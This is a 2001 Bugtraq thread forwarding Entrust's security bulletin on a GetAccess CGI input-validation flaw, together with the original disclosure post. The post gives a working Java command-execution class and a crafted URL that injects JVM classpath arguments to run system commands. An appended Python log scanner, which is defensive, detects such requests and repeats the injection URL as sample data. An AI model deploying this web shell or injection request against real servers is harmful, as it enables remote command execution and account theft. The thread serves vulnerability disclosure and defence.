[22048] in bugtraq
FW: Entrust - getAccess
daemon@ATHENA.MIT.EDU (MARTAK,PAVEL (HP-Czechia,ex1))
Wed Aug 1 11:02:43 2001
Message-ID: <FFE5E286773CD411873400D0B747AC58038E4076@goedel.bbn.hp.com>
From: "MARTAK,PAVEL (HP-Czechia,ex1)" <pavel_martak@hp.com>
To: bugtraq@securityfocus.com
Date: Wed, 1 Aug 2001 09:04:10 +0200
I did not see Entrust's answer posted to bugtraq, so I'm sending it.
Pavel M.
-----Original Message-----
From: GetAccess Support [mailto:getaccess.support@entrust.com]
Sent: 30 July 2001 16:37
To: 'MARTAK,PAVEL (HP-Czechia,ex1)'
Subject: RE: Entrust - getAccess
Good morning Pavel.
I've included the press release and patch details below. Please let me know
if you need clarification.
Sincerely,
Jeff
Entrust Security Bulletin E01-001
==================================
Subject: Entrust GetAccess(tm) CGI Script Vulnerability
Originally posted: July 27, 2001
Summary
=======
An internet newsgroup posting on BUGTRAQ has identified a vulnerability in
Entrust GetAccess that could allow unauthorized execution of Java programs
installed on GetAccess web servers. This vulnerability has been confirmed by
Entrust and a patch is forthcoming.
Detailed information on this issue has been posted to the Entrust customer
extranet on both the Entrust GetAccess Portal
(https://login.encommerce.com/private/docs/techSupport/Patches-BugFix/e01-001.html)
and the Entrust Customer Support Extranet
(https://www.entrust.com/support/resources/recentsecuritynotes.htm).
If you have trouble reaching the portals, please call: within North America
877-754-7878, elsewhere 613-270-3700. A hotline has been established for
the weekend of July 28th/29th, at +1 613 220 8357.
Affected Software Versions
==========================
- Entrust GetAccess, all versions and platforms
- Specifically, servers running the Access Service, administration
application, or runtimes.
Patch Availability
==================
Patches for this vulnerability will be posted to the Entrust customer
support extranet on or before Sunday, July 29th 2001.
==================
(c) Entrust Inc. 2001
Jeff McGrath
Web Security Team
getAccess Integration
Entrust, Inc.
"Securing the Internet"
Customer Support Phone: 1 877 PKI SUPT
mailto:support@entrust.com
http://www.entrust.com
-----Original Message-----
From: MARTAK,PAVEL (HP-Czechia,ex1) [mailto:pavel_martak@hp.com]
Sent: Monday, July 30, 2001 2:51 AM
To: support@entrust.com
Subject: FW: Entrust - getAccess
This was announced in BUGTRAQ.
PavelM
-----Original Message-----
From: rudi carell [mailto:rudicarell@hotmail.com]
Sent: 27 July 2001 13:34
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Entrust - getAccess
hola friends,
getAccess[tm] is used as a single-sign-on system often used for large
internet-portals.
--- snip (http://www.entrust.com) ---
Entrust GetAccess[tm] offers the most comprehensive solution for
consistently deploying and enforcing
basic and enhanced security across online applications, from Web browsers,
to enterprise applications and
legacy database systems.
--- snip ---
problem description:
due to missing input-validation it is possible to run(start) java-programs
on the "getaccess"-machine.
combined with publicly accessible uploads or any other possibility to create
class-files on the server this vulnerability could be used to run arbitrary
system commands on the target machine( or change getAccess parameters and
steal any user account you want BTW).
it should also be possible(but not proven yet) to exploit default-,install-
or demo classes within Java or getAccess which would make the
file-upload(creation) part unneeded!
(uninstall.class is very likely an effective DOS)
Example:
find exploitable getAccess-class(one which accepts params!) or upload a
"command" program:
--- cut here (example cmd.java) ---
import java.io.*;

public class cmd {
    public static void main(String args[]) {
        String s = null;  // line buffer for the child's output
        try {
            // run args[0] with the single argument args[1]
            Process p = Runtime.getRuntime().exec(args[0]+" "+args[1]);
            BufferedReader stdInput = new BufferedReader(new InputStreamReader(p.getInputStream()));
            BufferedReader stdError = new BufferedReader(new InputStreamReader(p.getErrorStream()));
            // CGI header, then relay stdout and stderr to the HTTP response
            System.out.println("Content-type: text/html\n\n");
            while ((s = stdInput.readLine()) != null) { System.out.println(s); }
            while ((s = stdError.readLine()) != null) { System.out.println(s); }
            System.exit(0);
        }
        catch (IOException e) { e.printStackTrace(); System.exit(-1); }
    }
}
--- cut here ---
later then .. a http-request to :
http://hostname/sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi
.. will run "/whereever/cmd.class" and execute "/bin/ls -alsi"
Summary:
object: *.gas.bat (all the getAccess cgi-shell-scripts)
class: input validation
remote: yes
vendor: has been informed with a separate e-mail ( entrust@entrust.com )
(and BTW. i would NEVER EVER recommend to use shell-scripts for
authentication purposes!)
nice day,
rC
rudicarell@hotmail.com
security@freefly.com
http://www.freefly.com/security/
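
Added example (not part of the original thread and not Entrust's or the poster's code): a log check a defender could run to find requests to the *.gas.bat wrappers that carry extra arguments in the path, as in the request quoted in the post. It assumes the web server writes Common Log Format and that the extra arguments arrive percent-encoded after the script name; the sample log lines are constructed.

```python
import re
from urllib.parse import unquote

# Request line of a Common Log Format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# A GetAccess CGI wrapper (*.gas.bat, per the post) and everything after it
WRAPPER_RE = re.compile(r"/[^/?\s]*\.gas\.bat(?P<extra>.*)", re.I | re.S)
# The JVM option seen in the posted request, as a separate argument
CLASSPATH_RE = re.compile(r"\s-classpath(\s|$)", re.I)

def classify(log_line):
    """Return (verdict, reason) for one access-log line."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return ("ignore", "no request line")
    # Decode %xx first so that %20 is seen as the space the script receives
    w = WRAPPER_RE.search(unquote(m.group("target")))
    if not w:
        return ("ignore", "not a *.gas.bat request")
    # Only the path after the script name is checked (assumption of this example)
    path_info = w.group("extra").split("?", 1)[0]
    if CLASSPATH_RE.search(path_info):
        return ("alert", "JVM classpath option in path-info")
    if re.search(r"\s", path_info):
        return ("alert", "whitespace in path-info")
    return ("ok", "no injected arguments")

def scan(lines):
    """Return (line_number, reason) for every line classified as an alert."""
    hits = []
    for number, line in enumerate(lines, 1):
        verdict, reason = classify(line)
        if verdict == "alert":
            hits.append((number, reason))
    return hits

# Constructed sample log (documentation addresses, not real traffic)
SAMPLE_LOG = [
    '192.0.2.10 - - [27/Jul/2001:13:40:01 +0200] "GET /sek-bin/login.gas.bat HTTP/1.0" 200 2210',
    '192.0.2.10 - - [27/Jul/2001:13:40:09 +0200] "POST /sek-bin/login.gas.bat?lang=en HTTP/1.0" 200 980',
    '198.51.100.7 - - [27/Jul/2001:13:41:30 +0200] "GET /sek-bin/login.gas.bat/x%20-classpath%20/whereever%20cmd%20/bin/ls%20-alsi HTTP/1.0" 200 512',
    '198.51.100.7 - - [27/Jul/2001:13:41:44 +0200] "GET /sek-bin/login.gas.bat/my%20page HTTP/1.0" 200 0',
    '192.0.2.10 - - [27/Jul/2001:13:43:00 +0200] "GET /index.html HTTP/1.0" 200 4096',
]

if __name__ == "__main__":
    for number, reason in scan(SAMPLE_LOG):
        print(f"line {number}: {reason}")
```

A hit in historical logs is a reason to review what the server ran at that time; the same two checks can also be applied in front of the wrappers to reject such requests until the vendor patch is installed.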